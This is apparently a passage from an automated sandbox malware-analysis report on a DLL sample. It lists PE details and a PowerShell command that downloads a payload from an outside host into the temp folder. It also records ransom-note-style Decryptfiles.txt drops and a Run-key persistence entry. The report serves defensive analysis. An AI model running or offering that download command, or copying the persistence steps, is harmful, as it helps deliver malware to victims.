Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: TD2HjoogPx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TD2HjoogPx.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D408840 push ecx; ret 0_2_6D408853
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40824F push ecx; ret 0_2_6D408262
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E1B1 push ecx; ret 20_2_00E8E1C4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E710 push ecx; ret 20_2_00E8E723
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARWJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARWJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D4073EF GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6D4073EF
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient PrivateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
